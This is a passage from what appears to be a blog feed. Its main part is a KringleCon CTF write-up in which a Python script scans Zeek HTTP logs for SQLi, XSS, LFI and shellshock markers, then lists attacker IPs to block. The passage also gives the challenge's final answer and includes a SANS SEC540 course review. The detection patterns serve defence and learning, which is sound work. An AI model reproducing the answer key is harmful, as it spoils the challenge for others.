&lt;span class="s2">&amp;#34;&amp;#39;&amp;#34;&lt;/span> &lt;span class="ow">in&lt;/span> &lt;span class="n">log&lt;/span>&lt;span class="p">[&lt;/span>&lt;span class="s1">&amp;#39;user_agent&amp;#39;&lt;/span>&lt;span class="p">]&lt;/span> &lt;span class="ow">or&lt;/span> &lt;span class="s2">&amp;#34;&amp;lt;&amp;#34;&lt;/span> &lt;span class="ow">in&lt;/span> &lt;span class="n">log&lt;/span>&lt;span class="p">[&lt;/span>&lt;span class="s1">&amp;#39;uri&amp;#39;&lt;/span>&lt;span class="p">]&lt;/span> &lt;span class="ow">or&lt;/span>
&lt;span class="s2">&amp;#34;&amp;lt;&amp;#34;&lt;/span> &lt;span class="ow">in&lt;/span> &lt;span class="n">log&lt;/span>&lt;span class="p">[&lt;/span>&lt;span class="s1">&amp;#39;host&amp;#39;&lt;/span>&lt;span class="p">]&lt;/span> &lt;span class="ow">or&lt;/span> &lt;span class="s2">&amp;#34;pass&amp;#34;&lt;/span> &lt;span class="ow">in&lt;/span> &lt;span class="n">log&lt;/span>&lt;span class="p">[&lt;/span>&lt;span class="s1">&amp;#39;uri&amp;#39;&lt;/span>&lt;span class="p">]&lt;/span> &lt;span class="ow">or&lt;/span>
&lt;span class="s2">&amp;#34;:;&amp;#34;&lt;/span> &lt;span class="ow">in&lt;/span> &lt;span class="n">log&lt;/span>&lt;span class="p">[&lt;/span>&lt;span class="s1">&amp;#39;uri&amp;#39;&lt;/span>&lt;span class="p">]&lt;/span> &lt;span class="ow">or&lt;/span> &lt;span class="s2">&amp;#34;};&amp;#34;&lt;/span> &lt;span class="ow">in&lt;/span> &lt;span class="n">log&lt;/span>&lt;span class="p">[&lt;/span>&lt;span class="s1">&amp;#39;uri&amp;#39;&lt;/span>&lt;span class="p">]):&lt;/span>
&lt;span class="n">ips_blacklist&lt;/span>&lt;span class="o">.&lt;/span>&lt;span class="n">add&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="n">log&lt;/span>&lt;span class="p">[&lt;/span>&lt;span class="s1">&amp;#39;id.orig_h&amp;#39;&lt;/span>&lt;span class="p">])&lt;/span>
&lt;span class="c1"># print IP blacklist for copy pasting into SRF FW&lt;/span>
&lt;span class="k">print&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="s2">&amp;#34;,&amp;#34;&lt;/span>&lt;span class="o">.&lt;/span>&lt;span class="n">join&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="n">ips_blacklist&lt;/span>&lt;span class="p">))&lt;/span>
&lt;/code>&lt;/pre>&lt;/div>&lt;p>This script loops through the Zeek logs and collects the &lt;strong>IP address&lt;/strong> and &lt;strong>user_agent&lt;/strong> values of entries we deem malicious. At the end it prints the collected IP addresses comma-separated on one line, which you can copy-paste into the Firewall input field on the SRF website, then click Deny and see if you found enough.&lt;/p>
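<p>The filtering logic can be exercised on its own with a couple of invented sample entries (a minimal, self-contained sketch: the IPs and URIs below are made up for illustration, while the field names follow the Zeek http.log schema used in the script above):</p>

```python
import json

# Two invented sample entries in the Zeek http.log JSON shape:
# the first carries a SQLi marker (') in its uri, the second looks benign.
sample = json.loads("""[
  {"id.orig_h": "10.0.0.1", "uri": "/api/login?id=' OR 1=1",
   "username": "-", "user_agent": "Mozilla/5.0", "host": "srf.elfu.org"},
  {"id.orig_h": "10.0.0.2", "uri": "/api/weather?station_id=42",
   "username": "-", "user_agent": "Mozilla/5.0", "host": "srf.elfu.org"}
]""")

ips_blacklist = set()
for log in sample:
    # same IoC markers as in the script above: SQLi, XSS, LFI, shell injection
    if ("'" in log['uri'] or "'" in log['username'] or
            "'" in log['user_agent'] or "<" in log['uri'] or
            "<" in log['host'] or "pass" in log['uri'] or
            ":;" in log['uri'] or "};" in log['uri']):
        ips_blacklist.add(log['id.orig_h'])

print(",".join(sorted(ips_blacklist)))  # prints 10.0.0.1
```

<p>Only the first entry trips a marker, so only its source IP lands on the blacklist; the benign weather query passes through untouched.</p>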
&lt;p>After pasting in the script output and clicking &lt;strong>DENY&lt;/strong> in the SRF firewall, the calculation still failed, most likely because the above script only found about 80 IP addresses, short of the 100 mentioned in the objective. I turned to the hints from Wunorse again and noticed this sentence:&lt;/p>
&lt;blockquote>
&lt;p>&lt;strong>If you find a log entry that definitely looks bad, try pivoting off other unusual attributes in that entry to find more bad IPs.&lt;/strong>&lt;/p>
&lt;/blockquote>
&lt;p>As a next step I extended the script and pivoted by looking for additional malicious IP addresses based on known bad &lt;strong>user_agent&lt;/strong> strings. The idea was to loop through the log again, and see if the current entry&amp;rsquo;s &lt;strong>user_agent&lt;/strong> matches any of the known malicious &lt;strong>user_agent&lt;/strong> values in our &lt;strong>ua_blacklist&lt;/strong>.&lt;/p>
&lt;div class="highlight">&lt;pre class="chroma">&lt;code class="language-python" data-lang="python">&lt;span class="n">ips_blacklist&lt;/span> &lt;span class="o">=&lt;/span> &lt;span class="nb">set&lt;/span>&lt;span class="p">()&lt;/span> &lt;span class="c1"># set of IPs found to be malicious&lt;/span>
&lt;span class="n">ua_blacklist&lt;/span> &lt;span class="o">=&lt;/span> &lt;span class="nb">list&lt;/span>&lt;span class="p">()&lt;/span> &lt;span class="c1"># list so that later on we can count items that are added multiple times&lt;/span>
&lt;span class="c1"># ... code removed for brevity&lt;/span>
&lt;span class="c1"># collect new malicious agents that match existing ones but not in ips_blacklist&lt;/span>
&lt;span class="k">for&lt;/span> &lt;span class="n">log&lt;/span> &lt;span class="ow">in&lt;/span> &lt;span class="n">logs&lt;/span>&lt;span class="p">:&lt;/span>
&lt;span class="k">if&lt;/span> &lt;span class="n">log&lt;/span>&lt;span class="p">[&lt;/span>&lt;span class="s1">&amp;#39;user_agent&amp;#39;&lt;/span>&lt;span class="p">]&lt;/span> &lt;span class="ow">in&lt;/span> &lt;span class="n">ua_blacklist&lt;/span> &lt;span class="ow">and&lt;/span> &lt;span class="n">log&lt;/span>&lt;span class="p">[&lt;/span>&lt;span class="s1">&amp;#39;id.orig_h&amp;#39;&lt;/span>&lt;span class="p">]&lt;/span> &lt;span class="ow">not&lt;/span> &lt;span class="ow">in&lt;/span> &lt;span class="n">ips_blacklist&lt;/span>&lt;span class="p">:&lt;/span>
&lt;span class="n">ips_blacklist&lt;/span>&lt;span class="o">.&lt;/span>&lt;span class="n">add&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="n">log&lt;/span>&lt;span class="p">[&lt;/span>&lt;span class="s1">&amp;#39;id.orig_h&amp;#39;&lt;/span>&lt;span class="p">])&lt;/span>
&lt;span class="n">ua_blacklist&lt;/span>&lt;span class="o">.&lt;/span>&lt;span class="n">append&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="n">log&lt;/span>&lt;span class="p">[&lt;/span>&lt;span class="s1">&amp;#39;user_agent&amp;#39;&lt;/span>&lt;span class="p">])&lt;/span>
&lt;/code>&lt;/pre>&lt;/div>&lt;p>This however produced far too many IP addresses, more than &lt;strong>200&lt;/strong>, so the list needed to be reduced somehow. For this I decided to create a third collection for whitelisting &lt;strong>user_agent&lt;/strong> strings that are seen often enough to suggest they are benign. After fiddling around with the threshold, I came to the conclusion that if the same &lt;strong>user_agent&lt;/strong> string is found more than &lt;strong>9&lt;/strong> times in the &lt;strong>ua_blacklist&lt;/strong>, then it can safely be added to a whitelist.&lt;/p>
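<p>The whitelisting step boils down to counting occurrences, which can be sketched with <code>collections.Counter</code> (a condensed, hypothetical stand-in for the full script below; the user_agent strings are invented, the threshold of 9 is the one settled on above):</p>

```python
from collections import Counter

# Hypothetical user_agent observations gathered during the pivot step:
# "curl-evil/1.0" seen twice (rare, stays suspicious),
# "Mozilla/5.0" seen ten times (common enough to look benign).
ua_blacklist = ["curl-evil/1.0"] * 2 + ["Mozilla/5.0"] * 10

# Any user_agent observed more than 9 times is assumed benign and
# whitelisted, so the IPs it pivoted in can be dropped from the block list.
ua_whitelist = {ua for ua, count in Counter(ua_blacklist).items() if count > 9}

print(ua_whitelist)  # {'Mozilla/5.0'}
```

<p><code>Counter</code> gives the same per-string tallies as the dict comprehension used in the full script, just in one library call.</p>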
&lt;p>The full python script can be found below and also in this Github
&lt;a href="https://github.com/florianakos/kringlecon-zeeklogs-srf/" target="_blank" rel="noopener">repo&lt;/a>. It prints out 110 IP addresses, which is more or less close to 100, and more importantly is an accepted solution on the SRF Firewall.&lt;/p>
&lt;div class="highlight">&lt;pre class="chroma">&lt;code class="language-python" data-lang="python">&lt;span class="kn">import&lt;/span> &lt;span class="nn">json&lt;/span>
&lt;span class="n">ips_blacklist&lt;/span> &lt;span class="o">=&lt;/span> &lt;span class="nb">set&lt;/span>&lt;span class="p">()&lt;/span> &lt;span class="c1"># set of IPs found to be malicious&lt;/span>
&lt;span class="n">ua_blacklist&lt;/span> &lt;span class="o">=&lt;/span> &lt;span class="nb">list&lt;/span>&lt;span class="p">()&lt;/span> &lt;span class="c1"># list so that later on we can count items that are added multiple times&lt;/span>
&lt;span class="n">ua_whitelist&lt;/span> &lt;span class="o">=&lt;/span> &lt;span class="nb">set&lt;/span>&lt;span class="p">()&lt;/span> &lt;span class="c1"># set of user_agents that are found to be benign&lt;/span>
&lt;span class="c1"># load the json into logs object&lt;/span>
&lt;span class="n">logs&lt;/span> &lt;span class="o">=&lt;/span> &lt;span class="n">json&lt;/span>&lt;span class="o">.&lt;/span>&lt;span class="n">load&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="nb">open&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="s2">&amp;#34;http.log&amp;#34;&lt;/span>&lt;span class="p">))&lt;/span>
&lt;span class="c1"># iterate over entries and filter based on identified markers of IoC&lt;/span>
&lt;span class="k">for&lt;/span> &lt;span class="n">log&lt;/span> &lt;span class="ow">in&lt;/span> &lt;span class="n">logs&lt;/span>&lt;span class="p">:&lt;/span>
&lt;span class="k">if&lt;/span> &lt;span class="p">(&lt;/span>&lt;span class="s2">&amp;#34;&amp;#39;&amp;#34;&lt;/span> &lt;span class="ow">in&lt;/span> &lt;span class="n">log&lt;/span>&lt;span class="p">[&lt;/span>&lt;span class="s1">&amp;#39;uri&amp;#39;&lt;/span>&lt;span class="p">]&lt;/span> &lt;span class="ow">or&lt;/span> &lt;span class="s2">&amp;#34;&amp;#39;&amp;#34;&lt;/span> &lt;span class="ow">in&lt;/span> &lt;span class="n">log&lt;/span>&lt;span class="p">[&lt;/span>&lt;span class="s1">&amp;#39;username&amp;#39;&lt;/span>&lt;span class="p">]&lt;/span> &lt;span class="ow">or&lt;/span>
&lt;span class="s2">&amp;#34;&amp;#39;&amp;#34;&lt;/span> &lt;span class="ow">in&lt;/span> &lt;span class="n">log&lt;/span>&lt;span class="p">[&lt;/span>&lt;span class="s1">&amp;#39;user_agent&amp;#39;&lt;/span>&lt;span class="p">]&lt;/span> &lt;span class="ow">or&lt;/span> &lt;span class="s2">&amp;#34;&amp;lt;&amp;#34;&lt;/span> &lt;span class="ow">in&lt;/span> &lt;span class="n">log&lt;/span>&lt;span class="p">[&lt;/span>&lt;span class="s1">&amp;#39;uri&amp;#39;&lt;/span>&lt;span class="p">]&lt;/span> &lt;span class="ow">or&lt;/span>
&lt;span class="s2">&amp;#34;&amp;lt;&amp;#34;&lt;/span> &lt;span class="ow">in&lt;/span> &lt;span class="n">log&lt;/span>&lt;span class="p">[&lt;/span>&lt;span class="s1">&amp;#39;host&amp;#39;&lt;/span>&lt;span class="p">]&lt;/span> &lt;span class="ow">or&lt;/span> &lt;span class="s2">&amp;#34;pass&amp;#34;&lt;/span> &lt;span class="ow">in&lt;/span> &lt;span class="n">log&lt;/span>&lt;span class="p">[&lt;/span>&lt;span class="s1">&amp;#39;uri&amp;#39;&lt;/span>&lt;span class="p">]&lt;/span> &lt;span class="ow">or&lt;/span>
&lt;span class="s2">&amp;#34;:;&amp;#34;&lt;/span> &lt;span class="ow">in&lt;/span> &lt;span class="n">log&lt;/span>&lt;span class="p">[&lt;/span>&lt;span class="s1">&amp;#39;uri&amp;#39;&lt;/span>&lt;span class="p">]&lt;/span> &lt;span class="ow">or&lt;/span> &lt;span class="s2">&amp;#34;};&amp;#34;&lt;/span> &lt;span class="ow">in&lt;/span> &lt;span class="n">log&lt;/span>&lt;span class="p">[&lt;/span>&lt;span class="s1">&amp;#39;uri&amp;#39;&lt;/span>&lt;span class="p">]):&lt;/span>
&lt;span class="n">ips_blacklist&lt;/span>&lt;span class="o">.&lt;/span>&lt;span class="n">add&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="n">log&lt;/span>&lt;span class="p">[&lt;/span>&lt;span class="s1">&amp;#39;id.orig_h&amp;#39;&lt;/span>&lt;span class="p">])&lt;/span>
&lt;span class="n">ua_blacklist&lt;/span>&lt;span class="o">.&lt;/span>&lt;span class="n">append&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="n">log&lt;/span>&lt;span class="p">[&lt;/span>&lt;span class="s1">&amp;#39;user_agent&amp;#39;&lt;/span>&lt;span class="p">])&lt;/span>
&lt;span class="c1"># collect new malicious agents that match existing ones but not in ips_blacklist&lt;/span>
&lt;span class="k">for&lt;/span> &lt;span class="n">log&lt;/span> &lt;span class="ow">in&lt;/span> &lt;span class="n">logs&lt;/span>&lt;span class="p">:&lt;/span>
&lt;span class="k">if&lt;/span> &lt;span class="n">log&lt;/span>&lt;span class="p">[&lt;/span>&lt;span class="s1">&amp;#39;user_agent&amp;#39;&lt;/span>&lt;span class="p">]&lt;/span> &lt;span class="ow">in&lt;/span> &lt;span class="n">ua_blacklist&lt;/span> &lt;span class="ow">and&lt;/span> &lt;span class="n">log&lt;/span>&lt;span class="p">[&lt;/span>&lt;span class="s1">&amp;#39;id.orig_h&amp;#39;&lt;/span>&lt;span class="p">]&lt;/span> &lt;span class="ow">not&lt;/span> &lt;span class="ow">in&lt;/span> &lt;span class="n">ips_blacklist&lt;/span>&lt;span class="p">:&lt;/span>
&lt;span class="n">ua_blacklist&lt;/span>&lt;span class="o">.&lt;/span>&lt;span class="n">append&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="n">log&lt;/span>&lt;span class="p">[&lt;/span>&lt;span class="s1">&amp;#39;user_agent&amp;#39;&lt;/span>&lt;span class="p">])&lt;/span>
&lt;span class="c1"># identifiy agents that are found more than 9 times &amp;gt; those should be benign and can be whitelisted&lt;/span>
&lt;span class="n">ua_blacklist_counts&lt;/span> &lt;span class="o">=&lt;/span> &lt;span class="p">{&lt;/span> &lt;span class="n">x&lt;/span> &lt;span class="p">:&lt;/span> &lt;span class="n">ua_blacklist&lt;/span>&lt;span class="o">.&lt;/span>&lt;span class="n">count&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="n">x&lt;/span>&lt;span class="p">)&lt;/span> &lt;span class="k">for&lt;/span> &lt;span class="n">x&lt;/span> &lt;span class="ow">in&lt;/span> &lt;span class="n">ua_blacklist&lt;/span> &lt;span class="p">}&lt;/span>
&lt;span class="k">for&lt;/span> &lt;span class="n">i&lt;/span> &lt;span class="ow">in&lt;/span> &lt;span class="n">ua_blacklist_counts&lt;/span>&lt;span class="p">:&lt;/span>
&lt;span class="k">if&lt;/span> &lt;span class="n">ua_blacklist_counts&lt;/span>&lt;span class="p">[&lt;/span>&lt;span class="n">i&lt;/span>&lt;span class="p">]&lt;/span> &lt;span class="o">&amp;gt;=&lt;/span> &lt;span class="mi">9&lt;/span>&lt;span class="p">:&lt;/span>
&lt;span class="n">ua_whitelist&lt;/span>&lt;span class="o">.&lt;/span>&lt;span class="n">add&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="n">i&lt;/span>&lt;span class="p">)&lt;/span>
&lt;span class="c1"># identify additional IPs that are in ua_blacklist and not in ua_whitelist&lt;/span>
&lt;span class="k">for&lt;/span> &lt;span class="n">log&lt;/span> &lt;span class="ow">in&lt;/span> &lt;span class="n">logs&lt;/span>&lt;span class="p">:&lt;/span>
&lt;span class="k">if&lt;/span> &lt;span class="n">log&lt;/span>&lt;span class="p">[&lt;/span>&lt;span class="s1">&amp;#39;user_agent&amp;#39;&lt;/span>&lt;span class="p">]&lt;/span> &lt;span class="ow">in&lt;/span> &lt;span class="n">ua_blacklist&lt;/span> &lt;span class="ow">and&lt;/span> &lt;span class="n">log&lt;/span>&lt;span class="p">[&lt;/span>&lt;span class="s1">&amp;#39;user_agent&amp;#39;&lt;/span>&lt;span class="p">]&lt;/span> &lt;span class="ow">not&lt;/span> &lt;span class="ow">in&lt;/span> &lt;span class="n">ua_whitelist&lt;/span> &lt;span class="ow">and&lt;/span> &lt;span class="n">log&lt;/span>&lt;span class="p">[&lt;/span>&lt;span class="s1">&amp;#39;id.orig_h&amp;#39;&lt;/span>&lt;span class="p">]&lt;/span> &lt;span class="ow">not&lt;/span> &lt;span class="ow">in&lt;/span> &lt;span class="n">ips_blacklist&lt;/span> &lt;span class="p">:&lt;/span>
&lt;span class="n">ips_blacklist&lt;/span>&lt;span class="o">.&lt;/span>&lt;span class="n">add&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="n">log&lt;/span>&lt;span class="p">[&lt;/span>&lt;span class="s1">&amp;#39;id.orig_h&amp;#39;&lt;/span>&lt;span class="p">])&lt;/span>
&lt;span class="c1"># print out comma separated string for pastin into srf.elfu.org firewall for DENY&lt;/span>
&lt;span class="k">print&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="s2">&amp;#34;,&amp;#34;&lt;/span>&lt;span class="o">.&lt;/span>&lt;span class="n">join&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="n">ips_blacklist&lt;/span>&lt;span class="p">))&lt;/span>
&lt;/code>&lt;/pre>&lt;/div>&lt;p>Output list of IP addresses that are most likely poisoning the weather API:&lt;/p>
&lt;div class="highlight">&lt;pre class="chroma">&lt;code class="language-Bash" data-lang="Bash">229.133.163.235,132.45.187.177,65.153.114.120,22.34.153.164,187.152.203.243,231.179.108.238,220.132.33.81,52.39.201.107,87.195.80.126,118.26.57.38,194.143.151.224,111.81.145.191,42.103.246.250,150.45.133.97,1.185.21.112,79.198.89.109,45.239.232.245,249.90.116.138,250.22.86.40,169.242.54.5,253.65.40.39,34.129.179.28,66.116.147.181,121.7.186.163,44.164.136.41,150.50.77.238,106.93.213.219,81.14.204.154,2.240.116.254,50.154.111.0,92.213.148.0,0.216.249.31,29.0.183.220,53.160.218.44,254.140.181.172,140.60.154.239,102.143.16.184,13.39.153.254,83.0.8.119,34.155.174.167,118.196.230.170,135.203.243.43,49.161.8.58,25.80.197.172,126.102.12.53,2.230.60.70,69.221.145.150,131.186.145.73,84.185.44.166,238.143.78.114,168.66.108.62,27.88.56.114,19.235.69.221,42.127.244.30,37.216.249.50,97.220.93.190,211.229.3.254,80.244.147.207,193.228.194.36,226.102.56.13,33.132.98.193,227.110.45.126,61.110.82.125,230.246.50.221,28.169.41.122,158.171.84.209,75.73.228.192,203.68.29.5,226.240.188.154,249.237.77.152,173.37.160.150,180.57.20.247,42.103.246.130,103.235.93.133,68.115.251.76,9.206.212.33,75.215.214.65,186.28.46.179,187.178.169.123,142.128.135.10,42.191.112.181,148.146.134.52,84.147.231.129,95.166.116.45,123.127.233.97,31.116.232.143,229.229.189.246,44.74.106.131,135.32.99.116,217.132.156.225,42.16.149.112,223.149.180.133,252.122.243.212,249.34.9.16,185.19.7.133,116.116.98.205,250.51.219.47,106.132.195.153,10.155.246.29,56.5.47.137,104.179.109.113,23.49.177.78,48.66.193.176,225.191.220.138,10.122.158.57,253.182.102.55,200.75.228.240,190.245.228.38,233.74.78.199,129.121.121.48
&lt;/code>&lt;/pre>&lt;/div>&lt;p>Once you submit this string and hit Deny, the calculator will start running and provide you with the RID that you need to submit for solving the final Objective.&lt;/p>
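&lt;p>As a side note, the user-agent frequency count in the script above (the dict comprehension over &lt;code>ua_blacklist&lt;/code>) can be expressed with &lt;code>collections.Counter&lt;/code>; a minimal, self-contained sketch with made-up agent strings:&lt;/p>

```python
from collections import Counter

# Made-up sample data standing in for the user agents collected above.
ua_blacklist = ["agentA"] * 10 + ["agentB"] * 2
ua_whitelist = set()

# Agents seen 9 or more times are assumed benign and whitelisted,
# matching the threshold used in the script above.
for agent, count in Counter(ua_blacklist).items():
    if count >= 9:
        ua_whitelist.add(agent)

print(ua_whitelist)  # {'agentA'}
```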
&lt;p>&lt;img src="../images/obj12-solution.png" alt="SRF solved">&lt;/p>
&lt;p>RID: &lt;strong>0807198508261964&lt;/strong>&lt;/p>
&lt;h2 id="the-bell-tower">The Bell Tower&lt;/h2>
&lt;p>Once you submit the RID through your personal badge, you get access to The Bell Tower through the door that just opened in the Sleigh Shop. Go up and talk to the fellas to finish this once and for all!&lt;/p>
&lt;p>&lt;img src="../images/obj12-belltower.png" alt="SRF solved">&lt;/p>
&lt;p>Santa seems quite grateful and happy:&lt;/p>
&lt;blockquote>
&lt;p>You did it! Thank you! You uncovered the sinister plot to destroy the holiday season!
Through your diligent efforts, we’ve brought the Tooth Fairy to justice and saved the holidays!
Ho Ho Ho!
The more I laugh, the more I fill with glee.
And the more the glee,
The more I&amp;rsquo;m a merrier me!
Merry Christmas and Happy Holidays.&lt;/p>
&lt;/blockquote>
&lt;p>Next you get some good news from Krampus:&lt;/p>
&lt;blockquote>
&lt;p>Congratulations on a job well done!
Oh, by the way, I won the Frido Sleigh contest.
I got 31.8% of the prizes, though I&amp;rsquo;ll have to figure that out.&lt;/p>
&lt;/blockquote>
&lt;p>Let&amp;rsquo;s hope he will share his lifetime supply of cookiez with others&amp;hellip; :) However, quite understandably, the Tooth Fairy is not as jolly as Krampus:&lt;/p>
&lt;blockquote>
&lt;p>You foiled my dastardly plan! I’m ruined! And I would have gotten away with it too, if it weren&amp;rsquo;t for you meddling kids!&lt;/p>
&lt;/blockquote>
&lt;p>What&amp;rsquo;s more, there is a suspicious note in the corner which seems to suggest we probably cannot rest for too long before the villains return and try to ruin the holiday once again&amp;hellip;&lt;/p>
&lt;p>&lt;img src="../images/obj12-note.png" alt="SRF solved">&lt;/p></description></item><item><title>Cloud Security Automation</title><link>https://flrnks.netlify.app/post/sans-sec540/</link><pubDate>Thu, 26 Nov 2020 11:11:00 +0000</pubDate><guid>https://flrnks.netlify.app/post/sans-sec540/</guid><description>&lt;p>In November 2020 I was lucky to have had the chance to take part in my 2nd SANS course of the year: &lt;strong>SEC540 - Cloud Security and DevOps Automation -&lt;/strong> as part of the
&lt;a href="https://www.sans.org/event/amsterdam-november-2020-live-online" target="_blank" rel="noopener">SANS Amsterdam&lt;/a>. Unlike the first one, this was conducted in a remote-only format that they call &lt;strong>LiveOnline&lt;/strong>. I liked it so much that I wanted to share it. If interested, you can read more about my experience of &lt;strong>SEC530 - Defensible Security Architecture -&lt;/strong> in
&lt;a href="https://flrnks.netlify.app/post/sans-sec530">this post&lt;/a> which was an on-site/in-person course as part of the
&lt;a href="https://www.sans.org/event/prague-march-2020" target="_blank" rel="noopener">SANS Prague&lt;/a> in March 2020.&lt;/p>
&lt;h2 id="pre-course">Pre-Course&lt;/h2>
&lt;p>About a week before the course was set to begin, I received the Course Booklets via UPS delivery. It was a bit surprising that they did not send an email with the tracking ID, so I was caught off-guard when I was told I needed to pick it up in a nearby UPS affiliate shop. Nevertheless, it was quite fast and efficient, so there were no issues there.&lt;/p>
&lt;p>Since this was a &lt;strong>LiveOnline&lt;/strong> course, I needed to download a few things from my SANS account in advance that would normally be distributed on USB sticks at the start of an in-person course. Luckily they sent numerous email reminders about this, and there are also great instructions available online, such as
&lt;a href="https://sansorg.egnyte.com/dl/wO5QUU3BK5/Power_Computing_-_Generic_Laptop_Requirements_Checklist_v2.0.docx_" target="_blank" rel="noopener">THIS&lt;/a> document.&lt;/p>
&lt;p>The most important item to download was of course the course VM for the Lab Exercises. For this course, it was a 9 GB ISO file containing the compressed VMware virtual machine image. This VM required quite substantial resources, so I felt lucky to have a work laptop with 32 GB RAM, an 8-core Intel i9 CPU and 1 TB of SSD storage. The RAM was especially critical for the VM: it needed at least 12 GB, but I gave it 16 just to be sure. For students whose machines were not powerful enough, there was an AMI image in AWS with a CloudFormation template to set it up quickly.&lt;/p>
&lt;p>In addition, we needed to download and set up Slack for chat support during the course and GoToTraining for the actual streaming of the course content. I found that for whatever reason the GoToTraining session was spiking my laptop&amp;rsquo;s CPU usage to the point that it was almost overheating, so I decided to use my tablet for the course streaming, which worked quite well.&lt;/p>
&lt;p>Last but not least, I also downloaded the course booklets in PDF format; however, they were heavily protected with watermarks and a complex password. Copy-pasting was also disabled. It would have been nice to open the PDFs on my tablet and use my pencil to write on them, but since I also had the printed booklets this was a minor annoyance.&lt;/p>
&lt;h2 id="course-content">Course Content&lt;/h2>
&lt;p>The first day started with an introduction to the principles of DevOps and how Security can be integrated into CI/CD pipelines. In between the topics, we were getting familiar with the student VM which is home to the Lab Exercises. I have to admit that at first I was quite overwhelmed by the complex setup that&amp;rsquo;s shipped in this single VM image. There were a surprising number of services running in docker containers behind the scenes, such as Jenkins, GitLab and Hashicorp Vault.&lt;/p>
&lt;p>As part of the day 1 labs we practiced the deployment of a web service using
&lt;a href="https://www.jenkins.io/" target="_blank" rel="noopener">Jenkins&lt;/a>. We also implemented improved security via pre-commit scanning and Security Analysis (SAST/DAST) as part of the CI/CD pipeline. The next day we set up the environment that paved our journey to the cloud (AWS) relying on concepts such as Infrastructure-as-Code (
&lt;a href="https://aws.amazon.com/cloudformation/" target="_blank" rel="noopener">Cloudformation&lt;/a>) and Configuration Management (
&lt;a href="https://puppet.com/" target="_blank" rel="noopener">Puppet&lt;/a>). On day 3 we embarked on a journey to harden our cloud infrastructure with tools that can do Security Scanning and Continuous Monitoring and Alerting (
&lt;a href="https://grafana.com/" target="_blank" rel="noopener">Grafana&lt;/a> &amp;amp;
&lt;a href="https://aws.amazon.com/cloudwatch/" target="_blank" rel="noopener">CloudWatch&lt;/a>). We also looked into secrets management best practices on-premise and in the cloud via
&lt;a href="https://www.vaultproject.io/" target="_blank" rel="noopener">Hashicorp Vault&lt;/a>. On day 4 we fixed some vulnerabilities in our web service using a blue/green deployment setup to minimize downtime. We also looked into protecting microservice APIs using serverless functions that aim to manage authorization and access control. On the final day we looked into certain concepts related to compliance in cloud environments and explored technologies such as
&lt;a href="https://aws.amazon.com/waf/" target="_blank" rel="noopener">AWS WAF&lt;/a>,
&lt;a href="https://duo.com/blog/introducing-cloudmapper-an-aws-visualization-tool" target="_blank" rel="noopener">CloudMapper&lt;/a> and
&lt;a href="https://cloudcustodian.io/" target="_blank" rel="noopener">Cloud Custodian&lt;/a>.&lt;/p>
&lt;p>I have to admit that the lab environment that&amp;rsquo;s set up in the Student VM was pretty impressive to me. There were so many moving parts to it, yet everything worked more or less seamlessly. The built-in Wiki always provided detailed instructions with copy-paste support to allow you to work through each lab even if you were unfamiliar with the technology. If you were stuck, you could get help very quickly from the Teaching Assistant or the Instructor. Overall they did an excellent job over the 5 days of the course.&lt;/p>
&lt;h2 id="netwars">NetWars&lt;/h2>
&lt;p>This post would not be complete without mention of the NetWars arena which I was very keen to take part in. During &lt;strong>#SEC530&lt;/strong> in March 2020, the NetWars arena was open only on Day 6 when we competed against each other in teams. Thanks to this course, I was invited to several free NetWars events afterwards, such as
&lt;a href="https://www.sans.org/cyber-ranges/netwars-tournaments/core/" target="_blank" rel="noopener">Core NetWars&lt;/a> and the Mini NetWars Missions 1-2-3-4.&lt;/p>
&lt;p>I am quite certain that these free NetWars sessions helped me immensely to hone my CTF skillz, which would come in handy during &lt;strong>#SEC540&lt;/strong> where I had 4 full days to compete. I jumped to the front of the leaderboard after the first night, as I stayed up until 3 am working on the NetWars questions. This was a bit reckless as I was tired the day after, so my focus on the course material was not the best, but a few rounds of coffee helped with that.&lt;/p>
&lt;p>&lt;img src="scoreboard.png" alt="SEC540-NetWars-Scoreboard">&lt;/p>
&lt;p>In the end I managed to keep my position at the top of the leaderboard, which made me feel really proud as I&amp;rsquo;d worked long and hard the whole week. I even managed to solve some of the more advanced &lt;code>1337&lt;/code> challenges that had no hints, just a description of what was required, and we were free to improvise the solution.&lt;/p>
&lt;p>Two months later my 2nd NetWars coin has finally arrived by post 🤩&lt;/p>
&lt;p>&lt;img src="coin.jpg" alt="SEC540-NetWars-Coin">&lt;/p>
&lt;h2 id="conclusions">Conclusions&lt;/h2>
&lt;p>Initially I was quite hesitant about attending &lt;strong>SEC540&lt;/strong> in the &lt;strong>LiveOnline&lt;/strong> format as I was not sure if it would work well. In the end I was left with only positive feelings about it. The course content was excellent. The delivery was smooth and help was always available through the Slack channel. If someone wants to learn about DevOps, Cloud and Security, I highly recommend this SANS course!&lt;/p>
&lt;h3 id="ps">P.S.&lt;/h3>
&lt;p>On the 1st of February, 2.5 months after my class I successfully passed the GIAC exam and became GCSA certified! 🎉&lt;/p></description></item><item><title>My first scala app</title><link>https://flrnks.netlify.app/post/aws-scala-tools/</link><pubDate>Sat, 10 Oct 2020 11:11:00 +0000</pubDate><guid>https://flrnks.netlify.app/post/aws-scala-tools/</guid><description>&lt;h2 id="motivation">Motivation&lt;/h2>
&lt;p>In this post I wanted to write about a personal project I started some time ago, with the goal of learning more about Scala. At work, we use Scala quite often to run big data jobs on AWS using Apache Spark. I&amp;rsquo;d never used Scala before joining my current team, and its syntax was very alien to me. However, recently I had the chance to work on a task where I had to modify a component to use AWS Secrets Manager instead of HashiCorp&amp;rsquo;s Vault for fetching some secret value at runtime. To my surprise I could complete this work without much struggle with Scala, and afterwards I became eager to learn more. Based on a colleague&amp;rsquo;s recommendation I started reading a book by Cay S. Horstmann titled &lt;strong>Scala for the Impatient (2nd edition)&lt;/strong>. I&amp;rsquo;m making slow but steady progress.&lt;/p>
&lt;p>
